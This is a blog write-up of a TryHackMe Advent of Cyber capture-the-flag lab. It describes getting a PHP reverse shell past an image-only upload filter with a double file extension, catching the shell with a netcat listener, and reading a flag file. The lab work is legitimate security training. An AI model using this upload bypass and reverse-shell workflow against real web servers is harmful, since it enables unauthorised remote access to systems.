TryHackMe — Advent of Cyber 2 — Day 2

Hello all,

With the notes and intro for day 2, it looks like we are dealing with file uploads, directory traversal and RCE. Let’s get into it and see if we are correct.

We are greeted with a page that tells you to use the code on the Room’s page as a GET parameter. Once we get to the new page, we have this upload section.

It seems like it will only take pictures. Going to test anyway with a few file types. But it is what it seems, only my .jpg and .png are showing up in the file browser.

Why re-write the wheel on something like this? Let’s use the already built out php reverse shell from Pentestmonkey — https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

All we need to change the IP and Port to the one on our Tunnel interface and whatever port we want to listen on.

Going to try and add another extension to my php reverse shell (.jpg) and see what happens. Sidenote: remember when working in a shared folder with Kali/Windows, Windows will quarantine your ‘malicious’ files….

Alrighty, we were able to upload the php-reverse-shell.jpg.php

Now to find where this gets uploaded.

First times the charm. /uploads/. So let’s get our Netcat listener up and running.

nc -nvlp 4444

And now navigate to the webpage, and we are in.

Now since we aren’t trying to escalate priveleges or go too far on this machine, Let’s just navigate to the ‘/var/www/flag.txt’ file where it tells us on the room page. Once again, I’ll leave that last part to you. Best of luck

Until next time,

-3lduderino

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store